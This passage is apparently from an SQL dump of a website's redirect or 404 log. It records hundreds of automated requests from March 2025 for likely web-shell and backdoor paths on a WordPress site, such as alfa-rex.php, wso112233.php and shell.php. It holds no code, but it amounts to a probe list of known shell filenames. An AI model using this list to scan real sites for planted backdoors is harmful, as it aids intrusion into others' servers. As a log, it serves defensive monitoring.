00:00:00',301),(38569,'http://3s-technologies.com.tr/tr/wp-content/plugin.php',NULL,'','',40,0,'2025-03-22 01:35:04','0000-00-00 00:00:00',301),(38570,'http://3s-technologies.com.tr/tr/wp-configs.php',NULL,'','',180,0,'2025-03-22 01:35:06','0000-00-00 00:00:00',301),(38571,'http://3s-technologies.com.tr/tr/wp-includes/text/wp.php',NULL,'','',21,0,'2025-03-22 01:35:06','0000-00-00 00:00:00',301),(38572,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/about.php',NULL,'','',41,0,'2025-03-22 01:35:08','0000-00-00 00:00:00',301),(38573,'http://3s-technologies.com.tr/tr/wp-admin/network/chosen.php',NULL,'','',64,0,'2025-03-22 01:35:08','0000-00-00 00:00:00',301),(38574,'http://3s-technologies.com.tr/tr/wp-includes/images/chosen.php',NULL,'','',30,0,'2025-03-22 01:35:09','0000-00-00 00:00:00',301),(38575,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/parx.php',NULL,'','',20,0,'2025-03-22 01:35:10','0000-00-00 00:00:00',301),(38576,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/about.php',NULL,'','',22,0,'2025-03-22 01:35:11','0000-00-00 00:00:00',301),(38577,'http://3s-technologies.com.tr/tr/network.php',NULL,'','',112,0,'2025-03-22 01:35:14','0000-00-00 00:00:00',301),(38578,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/wp-login.php',NULL,'','',32,0,'2025-03-22 01:35:14','0000-00-00 00:00:00',301),(38579,'http://3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager/updates.php',NULL,'','',34,0,'2025-03-22 01:35:15','0000-00-00 00:00:00',301),(38580,'http://3s-technologies.com.tr/tr/wp-content/uploads/file.php',NULL,'','',39,0,'2025-03-22 01:35:16','0000-00-00 00:00:00',301),(38581,'http://3s-technologies.com.tr/tr/wp-includes/requests/response/wp-login.php',NULL,'','',29,0,'2025-03-22 01:35:16','0000-00-00 00:00:00',301),(38582,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/alfa-rex.php',NULL,'','',34,0,'2025-03-22 01:35:17','0000-00-00 00:00:00',301),(38583,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/about.php',NULL,'','',30,0,'2025-03-22 01:35:18','0000-00-00 00:00:00',301),(38584,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/alfa-rex.php',NULL,'','',33,0,'2025-03-22 01:35:18','0000-00-00 00:00:00',301),(38585,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/wp-mail.php',NULL,'','',28,0,'2025-03-22 01:35:20','0000-00-00 00:00:00',301),(38586,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/public/assets/assets/sources/wp-login.php',NULL,'','',20,0,'2025-03-22 01:35:21','0000-00-00 00:00:00',301),(38587,'http://3s-technologies.com.tr/tr/wp-content/themes/file.php',NULL,'','',46,0,'2025-03-22 01:35:22','0000-00-00 00:00:00',301),(38588,'http://3s-technologies.com.tr/tr/css/item.php',NULL,'','',25,0,'2025-03-22 01:35:23','0000-00-00 00:00:00',301),(38589,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/admin.php',NULL,'','',23,0,'2025-03-22 01:35:23','0000-00-00 00:00:00',301),(38590,'http://3s-technologies.com.tr/tr/assets/images/wp-login.php',NULL,'','',30,0,'2025-03-22 01:35:25','0000-00-00 00:00:00',301),(38591,'http://3s-technologies.com.tr/tr/css/xp.php',NULL,'','',31,0,'2025-03-22 01:35:26','0000-00-00 00:00:00',301),(38592,'http://3s-technologies.com.tr/tr/wp-includes/assets/themes.php',NULL,'','',39,0,'2025-03-22 01:35:27','0000-00-00 00:00:00',301),(38593,'http://3s-technologies.com.tr/tr/wp-content/uploads/chosen.php',NULL,'','',50,0,'2025-03-22 01:35:28','0000-00-00 00:00:00',301),(38594,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/autoload_classmap.php',NULL,'','',58,0,'2025-03-22 01:35:29','0000-00-00 00:00:00',301),(38595,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/wp-login.php',NULL,'','',29,0,'2025-03-22 01:35:29','0000-00-00 00:00:00',301),(38596,'http://3s-technologies.com.tr/tr/js/style.php',NULL,'','',28,0,'2025-03-22 01:35:30','0000-00-00 00:00:00',301),(38597,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/wordpress/images/about.php',NULL,'','',32,0,'2025-03-22 01:35:32','0000-00-00 00:00:00',301),(38598,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/index.php',NULL,'','',37,0,'2025-03-22 01:35:33','0000-00-00 00:00:00',301),(38599,'http://3s-technologies.com.tr/tr/.well-known/dropdown.php',NULL,'','',32,0,'2025-03-22 01:35:34','0000-00-00 00:00:00',301),(38600,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/autoload_classmap.php',NULL,'','',36,0,'2025-03-22 01:35:34','0000-00-00 00:00:00',301),(38601,'http://3s-technologies.com.tr/tr/wp-content/upgrade/shell.php',NULL,'','',19,0,'2025-03-22 01:35:38','0000-00-00 00:00:00',301),(38602,'http://3s-technologies.com.tr/tr/wp-admin/user/bak.php',NULL,'','',24,0,'2025-03-22 01:35:39','0000-00-00 00:00:00',301),(38603,'http://3s-technologies.com.tr/tr/wp-admin/date.php',NULL,'','',28,0,'2025-03-22 01:35:41','0000-00-00 00:00:00',301),(38604,'http://3s-technologies.com.tr/tr/index/x.php',NULL,'','',26,0,'2025-03-22 01:35:41','0000-00-00 00:00:00',301),(38605,'http://3s-technologies.com.tr/tr/wp-includes/network.php',NULL,'','',24,0,'2025-03-22 01:35:42','0000-00-00 00:00:00',301),(38606,'http://3s-technologies.com.tr/tr/.well-known/.well-known/cc.php',NULL,'','',18,0,'2025-03-22 01:35:43','0000-00-00 00:00:00',301),(38607,'http://3s-technologies.com.tr/tr/wp-includes/pomo/chosen.php',NULL,'','',27,0,'2025-03-22 01:35:44','0000-00-00 00:00:00',301),(38608,'http://3s-technologies.com.tr/tr/css/cong.php',NULL,'','',24,0,'2025-03-22 01:35:45','0000-00-00 00:00:00',301),(38609,'http://3s-technologies.com.tr/tr/wp-includes/customize/shell.php',NULL,'','',18,0,'2025-03-22 01:35:45','0000-00-00 00:00:00',301),(38610,'http://3s-technologies.com.tr/tr/wp-content/upgrade/admin.php',NULL,'','',36,0,'2025-03-22 01:35:47','0000-00-00 00:00:00',301),(38611,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/variations.php',NULL,'','',18,0,'2025-03-22 01:35:48','0000-00-00 00:00:00',301),(38612,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/wp-login.php',NULL,'','',21,0,'2025-03-22 01:35:49','0000-00-00 00:00:00',301),(38613,'http://3s-technologies.com.tr/tr/wp-content/languages/link.php',NULL,'','',16,0,'2025-03-22 01:35:50','0000-00-00 00:00:00',301),(38614,'http://3s-technologies.com.tr/tr/wp-includes/customize/autoload_classmap.php',NULL,'','',28,0,'2025-03-22 01:35:52','0000-00-00 00:00:00',301),(38615,'http://3s-technologies.com.tr/tr/wp-includes/fonts/item.php',NULL,'','',17,0,'2025-03-22 01:35:53','0000-00-00 00:00:00',301),(38616,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc/json.php',NULL,'','',20,0,'2025-03-22 01:35:54','0000-00-00 00:00:00',301),(38617,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/wso112233.php',NULL,'','',16,0,'2025-03-22 01:35:55','0000-00-00 00:00:00',301),(38618,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/link.php',NULL,'','',16,0,'2025-03-22 01:35:56','0000-00-00 00:00:00',301),(38619,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/wp-login.php',NULL,'','',21,0,'2025-03-22 01:35:57','0000-00-00 00:00:00',301),(38620,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/alfa-rex.php',NULL,'','',21,0,'2025-03-22 01:35:58','0000-00-00 00:00:00',301),(38621,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/content.php',NULL,'','',19,0,'2025-03-22 01:35:59','0000-00-00 00:00:00',301),(38622,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/includeswp-conflg.php',NULL,'','',15,0,'2025-03-22 01:36:00','0000-00-00 00:00:00',301),(38623,'http://3s-technologies.com.tr/tr/wp-admin/mah.php',NULL,'','',36,0,'2025-03-22 01:36:01','0000-00-00 00:00:00',301),(38624,'http://3s-technologies.com.tr/tr/wp-admin/js/wp-login.php',NULL,'','',37,0,'2025-03-22 01:36:02','0000-00-00 00:00:00',301),(38625,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/about.php',NULL,'','',75,0,'2025-03-22 01:36:03','0000-00-00 00:00:00',301),(38626,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/core32.php',NULL,'','',19,0,'2025-03-22 01:36:04','0000-00-00 00:00:00',301),(38627,'http://3s-technologies.com.tr/tr/wp-includes/css/wp-login.php',NULL,'','',29,0,'2025-03-22 01:36:05','0000-00-00 00:00:00',301),(38628,'http://3s-technologies.com.tr/tr/wp-admin/includes/install.php',NULL,'','',25,0,'2025-03-22 01:36:06','0000-00-00 00:00:00',301),(38629,'http://3s-technologies.com.tr/tr/wp-content/languages/chosen.php',NULL,'','',57,0,'2025-03-22 01:36:07','0000-00-00 00:00:00',301),(38630,'http://3s-technologies.com.tr/tr/wp-includes/text/alfa-rex.php',NULL,'','',21,0,'2025-03-22 01:36:08','0000-00-00 00:00:00',301),(38631,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/index.php',NULL,'','',98,0,'2025-03-22 01:36:09','0000-00-00 00:00:00',301),(38632,'http://3s-technologies.com.tr/tr/admin/ty.php',NULL,'','',19,0,'2025-03-22 01:36:10','0000-00-00 00:00:00',301),(38633,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/wp-login.php',NULL,'','',22,0,'2025-03-22 01:36:13','0000-00-00 00:00:00',301),(38634,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/about.php',NULL,'','',58,0,'2025-03-22 01:36:14','0000-00-00 00:00:00',301),(38635,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/info.php',NULL,'','',16,0,'2025-03-22 01:36:15','0000-00-00 00:00:00',301),(38636,'http://3s-technologies.com.tr/tr/admin/images/slider/cufcfoh.php',NULL,'','',15,0,'2025-03-22 01:36:16','0000-00-00 00:00:00',301),(38637,'http://3s-technologies.com.tr/tr/wp-includes/blocks/edit.php',NULL,'','',15,0,'2025-03-22 01:36:17','0000-00-00 00:00:00',301),(38638,'http://3s-technologies.com.tr/tr/wp-includes/lock.php',NULL,'','',15,0,'2025-03-22 01:36:18','0000-00-00 00:00:00',301),(38639,'http://3s-technologies.com.tr/tr/wp-content/upgrade/wp-sigunq.php',NULL,'','',21,0,'2025-03-22 01:36:19','0000-00-00 00:00:00',301),(38640,'http://3s-technologies.com.tr/tr/wp-includes/certificates/up.php',NULL,'','',15,0,'2025-03-22 01:36:20','0000-00-00 00:00:00',301),(38641,'http://3s-technologies.com.tr/tr/admin/atomlib.php',NULL,'','',16,0,'2025-03-22 01:36:21','0000-00-00 00:00:00',301),(38642,'http://3s-technologies.com.tr/tr/item.php',NULL,'','',282,0,'2025-03-22 01:36:22','0000-00-00 00:00:00',301),(38643,'http://3s-technologies.com.tr/tr/wp-includes/js/alfa-rex.php',NULL,'','',20,0,'2025-03-22 01:36:23','0000-00-00 00:00:00',301),(38644,'http://3s-technologies.com.tr/tr/admin/upload/themes-install.php',NULL,'','',19,0,'2025-03-22 01:36:25','0000-00-00 00:00:00',301),(38645,'http://3s-technologies.com.tr/tr/wp-admin/js/alfa-rex.php',NULL,'','',20,0,'2025-03-22 01:36:27','0000-00-00 00:00:00',301),(38646,'http://3s-technologies.com.tr/tr/wp-includes/assets/file.php',NULL,'','',19,0,'2025-03-22 01:36:28','0000-00-00 00:00:00',301),(38647,'http://3s-technologies.com.tr/tr/include/mail.php',NULL,'','',15,0,'2025-03-22 01:36:30','0000-00-00 00:00:00',301),(38648,'http://3s-technologies.com.tr/tr/bs1.php',NULL,'','',134,0,'2025-03-22 01:36:31','0000-00-00 00:00:00',301),(38649,'http://3s-technologies.com.tr/tr/wp-admin/log.php',NULL,'','',36,0,'2025-03-22 01:36:33','0000-00-00 00:00:00',301),(38650,'http://3s-technologies.com.tr/tr/wp-content/plugins/xmrlpc.php',NULL,'','',13,0,'2025-03-22 01:36:33','0000-00-00 00:00:00',301),(38651,'http://3s-technologies.com.tr/tr/wp-admin/images/alfa-rex.php',NULL,'','',18,0,'2025-03-22 01:36:37','0000-00-00 00:00:00',301),(38652,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/wordpress/images/wp-login.php',NULL,'','',17,0,'2025-03-22 01:36:38','0000-00-00 00:00:00',301),(38653,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/wp-login.php',NULL,'','',15,0,'2025-03-22 01:36:40','0000-00-00 00:00:00',301),(38654,'http://3s-technologies.com.tr/tr/uploads/test.php',NULL,'','',21,0,'2025-03-22 01:36:41','0000-00-00 00:00:00',301),(38655,'http://3s-technologies.com.tr/tr/max.php',NULL,'','',98,0,'2025-03-22 01:36:42','0000-00-00 00:00:00',301),(38656,'http://3s-technologies.com.tr/tr/wp-content/upgrade/info.php',NULL,'','',13,0,'2025-03-22 01:36:44','0000-00-00 00:00:00',301),(38657,'http://3s-technologies.com.tr/tr/wp-includes/requests/cookie/wp-login.php',NULL,'','',13,0,'2025-03-22 01:36:44','0000-00-00 00:00:00',301),(38658,'http://3s-technologies.com.tr/tr/plugins/phpthumb/404.php',NULL,'','',14,0,'2025-03-22 01:36:46','0000-00-00 00:00:00',301),(38659,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/about.php',NULL,'','',19,0,'2025-03-22 01:36:47','0000-00-00 00:00:00',301),(38660,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/index.php',NULL,'','',35,0,'2025-03-22 01:36:48','0000-00-00 00:00:00',301),(38661,'http://3s-technologies.com.tr/tr/plugins/daozm.php',NULL,'','',23,0,'2025-03-22 01:36:53','0000-00-00 00:00:00',301),(38662,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/gecko.php',NULL,'','',20,0,'2025-03-22 01:36:55','0000-00-00 00:00:00',301),(38663,'http://3s-technologies.com.tr/tr/wp-admin/network/lock.php',NULL,'','',19,0,'2025-03-22 01:36:56','0000-00-00 00:00:00',301),(38664,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/system.php',NULL,'','',19,0,'2025-03-22 01:36:57','0000-00-00 00:00:00',301),(38665,'http://3s-technologies.com.tr/tr/about/wp-conflg.php',NULL,'','',15,0,'2025-03-22 01:36:58','0000-00-00 00:00:00',301),(38666,'http://3s-technologies.com.tr/tr/assets/admin.php',NULL,'','',37,0,'2025-03-22 01:36:59','0000-00-00 00:00:00',301),(38667,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/alfa-rex.php',NULL,'','',15,0,'2025-03-22 01:36:59','0000-00-00 00:00:00',301),(38668,'http://3s-technologies.com.tr/tr/wp-content/blue.php',NULL,'','',22,0,'2025-03-22 01:37:02','0000-00-00 00:00:00',301),(38669,'http://3s-technologies.com.tr/tr/wp-content/configs.php',NULL,'','',15,0,'2025-03-22 01:37:03','0000-00-00 00:00:00',301),(38670,'http://3s-technologies.com.tr/tr/wp-includes/images/media/about.php',NULL,'','',20,0,'2025-03-22 01:37:03','0000-00-00 00:00:00',301),(38671,'http://3s-technologies.com.tr/tr/wp-admin/plugin.php',NULL,'','',24,0,'2025-03-22 01:37:06','0000-00-00 00:00:00',301),(38672,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/alfa-rex.php',NULL,'','',23,0,'2025-03-22 01:37:06','0000-00-00 00:00:00',301),(38673,'http://3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager/owlmailer.php',NULL,'','',15,0,'2025-03-22 01:37:07','0000-00-00 00:00:00',301),(38674,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/classwithtostring.php',NULL,'','',19,0,'2025-03-22 01:37:09','0000-00-00 00:00:00',301),(38675,'http://3s-technologies.com.tr/tr/upload/wp-info.php',NULL,'','',45,0,'2025-03-22 01:37:10','0000-00-00 00:00:00',301),(38676,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/blue.php',NULL,'','',15,0,'2025-03-22 01:37:12','0000-00-00 00:00:00',301),(38677,'http://3s-technologies.com.tr/tr/wp-content/wp-configs.php',NULL,'','',16,0,'2025-03-22 01:37:13','0000-00-00 00:00:00',301),(38678,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/alfa-rex.php',NULL,'','',15,0,'2025-03-22 01:37:15','0000-00-00 00:00:00',301),(38679,'http://3s-technologies.com.tr/tr/wp-includes/requests/response/siteindex.php',NULL,'','',19,0,'2025-03-22 01:37:16','0000-00-00 00:00:00',301),(38680,'http://3s-technologies.com.tr/tr/wp-includes/blocks/wp-conflg.php',NULL,'','',47,0,'2025-03-22 01:37:16','0000-00-00 00:00:00',301),(38681,'http://3s-technologies.com.tr/tr/wp-includes/pomo/install.php',NULL,'','',23,0,'2025-03-22 01:37:19','0000-00-00 00:00:00',301),(38682,'http://3s-technologies.com.tr/tr/wp-includes/packed.php',NULL,'','',20,0,'2025-03-22 01:37:20','0000-00-00 00:00:00',301),(38683,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/network.php',NULL,'','',13,0,'2025-03-22 01:37:22','0000-00-00 00:00:00',301),(38684,'http://3s-technologies.com.tr/tr/wp-includes/id3/autoload_classmap.php',NULL,'','',51,0,'2025-03-22 01:37:23','0000-00-00 00:00:00',301),(38685,'http://3s-technologies.com.tr/tr/images/autoload_classmap.php',NULL,'','',27,0,'2025-03-22 01:37:24','0000-00-00 00:00:00',301),(38686,'http://3s-technologies.com.tr/tr/wp-content/plugins/cache.php',NULL,'','',15,0,'2025-03-22 01:37:25','0000-00-00 00:00:00',301),(38687,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/index.php',NULL,'','',91,0,'2025-03-22 01:37:26','0000-00-00 00:00:00',301),(38688,'http://3s-technologies.com.tr/tr/wp-content/uploads/link.php',NULL,'','',27,0,'2025-03-22 01:37:28','0000-00-00 00:00:00',301),(38689,'http://3s-technologies.com.tr/tr/wp-content/uploads/plugins.php',NULL,'','',31,0,'2025-03-22 01:37:30','0000-00-00 00:00:00',301),(38690,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/alfa-rex.php',NULL,'','',27,0,'2025-03-22 01:37:30','0000-00-00 00:00:00',301),(38691,'http://3s-technologies.com.tr/tr/wp-includes/html-api/wp-login.php',NULL,'','',32,0,'2025-03-22 01:37:33','0000-00-00 00:00:00',301),(38692,'http://3s-technologies.com.tr/tr/assets/edit.php',NULL,'','',47,0,'2025-03-22 01:37:33','0000-00-00 00:00:00',301),(38693,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/about.php',NULL,'','',24,0,'2025-03-22 01:37:34','0000-00-00 00:00:00',301),(38694,'http://3s-technologies.com.tr/tr/wp-content/file.php',NULL,'','',127,0,'2025-03-22 01:37:35','0000-00-00 00:00:00',301),(38695,'http://3s-technologies.com.tr/tr/.well-known/pkivalidation/log.php',NULL,'','',23,0,'2025-03-22 01:37:35','0000-00-00 00:00:00',301),(38696,'http://3s-technologies.com.tr/tr/wp-admin/packed.php',NULL,'','',24,0,'2025-03-22 01:37:37','0000-00-00 00:00:00',301),(38697,'http://3s-technologies.com.tr/tr/filemanager.php',NULL,'','',162,0,'2025-03-22 01:37:40','0000-00-00 00:00:00',301),(38698,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/wp-login.php',NULL,'','',33,0,'2025-03-22 01:37:40','0000-00-00 00:00:00',301),(38699,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/index.php',NULL,'','',23,0,'2025-03-22 01:37:41','0000-00-00 00:00:00',301),(38700,'http://3s-technologies.com.tr/tr/goat1.php',NULL,'','',110,0,'2025-03-22 01:37:45','0000-00-00 00:00:00',301),(38701,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/class-config.php',NULL,'','',25,0,'2025-03-22 01:37:46','0000-00-00 00:00:00',301),(38702,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/index.php',NULL,'','',67,0,'2025-03-22 01:37:46','0000-00-00 00:00:00',301),(38703,'http://3s-technologies.com.tr/tr/wp-includes/html-api/cloud.php',NULL,'','',17,0,'2025-03-22 01:37:47','0000-00-00 00:00:00',301),(38704,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes/alfa-rex.php',NULL,'','',16,0,'2025-03-22 01:37:48','0000-00-00 00:00:00',301),(38705,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/classwithtostring.php',NULL,'','',20,0,'2025-03-22 01:37:49','0000-00-00 00:00:00',301),(38706,'http://3s-technologies.com.tr/tr/wp-includes/pomo/rk2.php',NULL,'','',17,0,'2025-03-22 01:37:50','0000-00-00 00:00:00',301),(38707,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/index.php',NULL,'','',79,0,'2025-03-22 01:37:50','0000-00-00 00:00:00',301),(38708,'http://3s-technologies.com.tr/tr/wp-content/themes/plugin.php',NULL,'','',27,0,'2025-03-22 01:37:51','0000-00-00 00:00:00',301),(38709,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/blue.php',NULL,'','',17,0,'2025-03-22 01:37:52','0000-00-00 00:00:00',301),(38710,'http://3s-technologies.com.tr/tr/wp-admin/maint/buy.php',NULL,'','',16,0,'2025-03-22 01:37:53','0000-00-00 00:00:00',301),(38711,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/wso112233.php',NULL,'','',19,0,'2025-03-22 01:37:53','0000-00-00 00:00:00',301),(38712,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/shell.php',NULL,'','',17,0,'2025-03-22 01:37:54','0000-00-00 00:00:00',301),(38713,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/esyfvxgmdq.php',NULL,'','',20,0,'2025-03-22 01:37:57','0000-00-00 00:00:00',301),(38714,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/autoload_classmap.php',NULL,'','',29,0,'2025-03-22 01:37:57','0000-00-00 00:00:00',301),(38715,'http://3s-technologies.com.tr/tr/wp-includes/customize/wp-conflg.php',NULL,'','',27,0,'2025-03-22 01:38:00','0000-00-00 00:00:00',301),(38716,'http://3s-technologies.com.tr/tr/wp-includes/images/media/text.php',NULL,'','',16,0,'2025-03-22 01:38:01','0000-00-00 00:00:00',301),(38717,'http://3s-technologies.com.tr/tr/wp-includes/customize/muse.php',NULL,'','',16,0,'2025-03-22 01:38:02','0000-00-00 00:00:00',301),(38718,'http://3s-technologies.com.tr/tr/wp-admin/js/admin.php',NULL,'','',55,0,'2025-03-22 01:38:03','0000-00-00 00:00:00',301),(38719,'http://3s-technologies.com.tr/tr/wp-includes/certificates/about.php',NULL,'','',62,0,'2025-03-22 01:38:03','0000-00-00 00:00:00',301),(38720,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/chosen.php',NULL,'','',21,0,'2025-03-22 01:38:05','0000-00-00 00:00:00',301),(38721,'http://3s-technologies.com.tr/tr/wp-content/uploads/2022/update.php',NULL,'','',16,0,'2025-03-22 01:38:05','0000-00-00 00:00:00',301),(38722,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/network.php',NULL,'','',25,0,'2025-03-22 01:38:07','0000-00-00 00:00:00',301),(38723,'http://3s-technologies.com.tr/tr/.well-knownold/inputs.php',NULL,'','',15,0,'2025-03-22 01:38:10','0000-00-00 00:00:00',301),(38724,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/chosen.php',NULL,'','',21,0,'2025-03-22 01:38:11','0000-00-00 00:00:00',301),(38725,'http://3s-technologies.com.tr/tr/assets/images/about.php',NULL,'','',21,0,'2025-03-22 01:38:12','0000-00-00 00:00:00',301),(38726,'http://3s-technologies.com.tr/tr/admin/uploads/lv.php',NULL,'','',15,0,'2025-03-22 01:38:14','0000-00-00 00:00:00',301),(38727,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes/about.php',NULL,'','',19,0,'2025-03-22 01:38:14','0000-00-00 00:00:00',301),(38728,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/lock.php',NULL,'','',21,0,'2025-03-22 01:38:15','0000-00-00 00:00:00',301),(38729,'http://3s-technologies.com.tr/tr/admin/uploads/media.php',NULL,'','',15,0,'2025-03-22 01:38:17','0000-00-00 00:00:00',301),(38730,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/about.php',NULL,'','',39,0,'2025-03-22 01:38:18','0000-00-00 00:00:00',301),(38731,'http://3s-technologies.com.tr/tr/browse.php',NULL,'','',60,0,'2025-03-22 01:38:19','0000-00-00 00:00:00',301),(38732,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/alfa-rex.php',NULL,'','',28,0,'2025-03-22 01:38:21','0000-00-00 00:00:00',301),(38733,'http://3s-technologies.com.tr/tr/index/lock.php',NULL,'','',23,0,'2025-03-22 01:38:22','0000-00-00 00:00:00',301),(38734,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/chosen.php',NULL,'','',51,0,'2025-03-22 01:38:23','0000-00-00 00:00:00',301),(38735,'http://3s-technologies.com.tr/tr/wp-content/config.php',NULL,'','',21,0,'2025-03-22 01:38:24','0000-00-00 00:00:00',301),(38736,'http://3s-technologies.com.tr/tr/css/chosen.php',NULL,'','',50,0,'2025-03-22 01:38:28','0000-00-00 00:00:00',301),(38737,'http://3s-technologies.com.tr/tr/wp-includes/requests/utility/cc.php',NULL,'','',21,0,'2025-03-22 01:38:29','0000-00-00 00:00:00',301),(38738,'http://3s-technologies.com.tr/tr/wp-admin/update.php',NULL,'','',24,0,'2025-03-22 01:38:31','0000-00-00 00:00:00',301),(38739,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/fm.php',NULL,'','',23,0,'2025-03-22 01:38:32','0000-00-00 00:00:00',301),(38740,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/gecko.php',NULL,'','',18,0,'2025-03-22 01:38:33','0000-00-00 00:00:00',301),(38741,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/index.php',NULL,'','',143,0,'2025-03-22 01:38:35','0000-00-00 00:00:00',301),(38742,'http://3s-technologies.com.tr/tr/bugz.php',NULL,'http://3s-technologies.com.tr/bugz.php','',26,0,'2025-03-22 02:40:04','0000-00-00 00:00:00',301),(38743,'http://3s-technologies.com.tr/tr/indec.php',NULL,'http://3s-technologies.com.tr/indec.php','',3,0,'2025-03-22 02:40:06','0000-00-00 00:00:00',301),(38744,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-super-cache/wp-cache-pointer.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-super-cache/wp-cache-pointer.php','',2,0,'2025-03-22 02:40:08','0000-00-00 00:00:00',301),(38745,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer/vc_classmap.json-list.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/js_composer/vc_classmap.json-list.php','',2,0,'2025-03-22 02:40:08','0000-00-00 00:00:00',301),(38746,'http://3s-technologies.com.tr/tr/wp-content/plugins/social-gallery-block/pop.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/social-gallery-block/pop.php','',2,0,'2025-03-22 02:40:09','0000-00-00 00:00:00',301),(38747,'http://3s-technologies.com.tr/tr/wp-admin/includes/string.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/String.php','',2,0,'2025-03-22 02:40:10','0000-00-00 00:00:00',301),(38748,'http://3s-technologies.com.tr/tr/wp-content/upgrade/string.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/String.php','',2,0,'2025-03-22 02:40:11','0000-00-00 00:00:00',301),(38749,'http://3s-technologies.com.tr/tr/size.php',NULL,'http://3s-technologies.com.tr/size.php','',50,0,'2025-03-22 02:40:12','0000-00-00 00:00:00',301),(38750,'http://3s-technologies.com.tr/tr/wp-content/themes/news-portal/error.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/news-portal/error.php','',7,0,'2025-03-22 02:40:12','0000-00-00 00:00:00',301),(38751,'http://3s-technologies.com.tr/tr/wp-log1n.php',NULL,'http://3s-technologies.com.tr/wp-log1n.php','',4,0,'2025-03-22 02:40:16','0000-00-00 00:00:00',301),(38752,'http://3s-technologies.com.tr/tr/wp-content/wp-log1n.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-log1n.php','',2,0,'2025-03-22 02:40:16','0000-00-00 00:00:00',301),(38753,'http://3s-technologies.com.tr/tr/wp-includes/networks.php',NULL,'http://3s-technologies.com.tr/wp-includes/networks.php','',2,0,'2025-03-22 02:40:18','0000-00-00 00:00:00',301),(38754,'http://3s-technologies.com.tr/tr/wp-content/options.php',NULL,'http://3s-technologies.com.tr/wp-content/options.php','',4,0,'2025-03-22 02:40:19','0000-00-00 00:00:00',301),(38755,'http://3s-technologies.com.tr/tr/wp-content/networks.php',NULL,'http://3s-technologies.com.tr/wp-content/networks.php','',2,0,'2025-03-22 02:40:20','0000-00-00 00:00:00',301),(38756,'http://3s-technologies.com.tr/tr/wp-content/themes/admin.php?taf',NULL,'http://3s-technologies.com.tr/wp-content/themes/admin.php?taf','',1,0,'2025-03-22 02:40:22','0000-00-00 